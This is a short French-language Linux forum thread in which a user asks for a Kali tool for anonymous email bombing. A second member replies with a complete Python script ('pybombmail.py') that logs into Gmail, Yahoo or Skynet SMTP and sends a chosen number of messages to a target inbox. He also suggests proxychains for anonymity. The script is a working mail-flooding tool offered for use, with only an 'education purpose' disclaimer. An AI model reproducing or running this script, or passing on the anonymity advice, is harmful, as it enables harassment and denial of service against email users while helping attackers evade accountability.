user@linuxtrack:~ $ python -c 'print("Soyez les bienvenus !")'

Vous n'êtes pas identifié(e).

#1 31-01-2014 17:44:45

itichy
#! The itichy and Scratachy Show

mail bombing

Bonjour je voulais savoir si il existe une appli sous kali pour faire du email bombing anonyme ?


ядра паники

Hors ligne

#2 31-01-2014 19:08:27

IceF0x
#! Gourou Linux

Re : mail bombing

Tu as ceci http://linuxtrack.net/viewtopic.php?id=356

Et ceci un excellent code posté sur le blog de k0n1k

L1r3 la Su1t3 >>>

J'ai rajouté mon serveur smtp au code pour ma part afin de tester sur ma boite.

#!/usr/bin/python
#pybombmail.py by aBi71
#This code for education purpose only.
#Use it at your own risk !!!

import os
import smtplib
import getpass
import sys


server = raw_input ('Server Mail: ')
user = raw_input('Username: ')
passwd = getpass.getpass('Password: ')


to = raw_input('\nTo: ')
#subject = raw_input('Subject: ') 
body = raw_input('Message: ')
total = input('Number of send: ')

if server == 'gmail':
    smtp_server = 'smtp.gmail.com'
    port = 587
elif server == 'yahoo':
    smtp_server = 'smtp.mail.yahoo.com'
    port = 25
elif server == 'skynet':
    smtp_server = 'relay.skynet.be'
    port = 25   
else:
    print 'Applies only to gmail, skynet and yahoo.'
    sys.exit()

print ''

try:
    server = smtplib.SMTP(smtp_server,port) 
    server.ehlo()
    if smtp_server == "smtp.gmail.com":
            server.starttls()
    server.login(user,passwd)
    for i in range(1, total+1):
        subject = os.urandom(9)
        msg = 'From: ' + user + '\nSubject: ' + subject + '\n' + body
        server.sendmail(user,to,msg)
        print "\rTotal emails sent: %i" % i
        sys.stdout.flush()
    server.quit()
    print '\n Done !!!'
except KeyboardInterrupt:
    print '[-] Canceled'
    sys.exit()
except smtplib.SMTPAuthenticationError:
    print '\n[!] The username or password you entered is incorrect.'
    sys.exit()

Maintenant pour l'anonymat, tu peux passer par proxychain etc.. mais c'est pas garanti.


Utiliser des logiciels propriétaires, c'est comme les plats préparés, on est incapable de dire les conservateurs qu'ils contiennent, on dira toujours que c'est bon, mais ça ne remplacera jamais le repas fait maison par sa maman.
]:D #! Crunchbang & Archlinux GNU/Linux User ]:D

Hors ligne

#3 31-01-2014 19:28:00

itichy
#! The itichy and Scratachy Show

Re : mail bombing

merci icefox


ядра паники

Hors ligne

Pied de page des forums